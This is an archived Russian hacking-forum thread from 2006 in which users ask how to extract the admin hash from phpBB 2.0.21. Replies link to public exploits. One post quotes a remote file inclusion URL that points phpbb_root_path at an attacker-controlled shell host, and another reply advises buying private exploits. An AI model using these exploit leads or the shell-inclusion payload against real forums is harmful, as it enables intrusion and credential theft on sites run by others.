PDA

Просмотр полной версии : Кто реально вытаскивал хеш админа форума на phpBB2.0.21?


oxigen
25.10.2006, 14:48
Сейчас phpBB один из самых стабильных состем форумов.
Есть ли такие перцы кто всё же ломал последню версию?

Если не секрет то как? каким экспойтом, или чем-то другим?

Поделись - интересно.

Пробывали многие, но у кого получалось?

rijy
25.10.2006, 15:01
multiple PHP application poison NULL byte vulnerability phpBB 2.0.21
http://milw0rm.com/exploits/2348

Minerva <= 2.0.21 build 238a (phpbb_root_path) File Include Vulnerability
http://milw0rm.com/exploits/2429

з.ы. сам пока не пробовал эту версию...

Brahma
25.10.2006, 20:21
последний сплойт

Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=http://SHELLURL.COM
В упор не вижу файла admin_topic_action_logging.php?... (во 2ой ветке..)

syntacsis
27.10.2006, 05:00
В упор не вижу файла admin_topic_action_logging.php?... (во 2ой ветке..)

Неудивительно =)
Это файл от мода "Admin Topic Action Logging Mod" для phpbb. Сплоит если и будет работать, то только на форуме с этим модом


Есть ли такие перцы кто всё же ломал последню версию?
Если не секрет то как? каким экспойтом, или чем-то другим?
Поделись - интересно.


Насколько мне известно, такие перцы есть. И тут на ачате тоже. И совсем не секрет, чем они ломали - мозгами и руками. =)

oxigen
27.10.2006, 16:44
syntacsis, дай плх их ники. Просто задать пару вопросов, ну или пусть сами отвят каким эксплойтом или снифером. Мне нужно знать чем, а уж как я разберусь.
Как ни как поиск рулит!

_-[A.M.D]HiM@S-_
27.10.2006, 19:07
ну или пусть сами отвят каким эксплойтом или снифером


тут тебе этого не ответят ) ибо приват сплойты :)
Обратись в Роздел "покупка продажа" и напиши сплойт "для такой-то версии"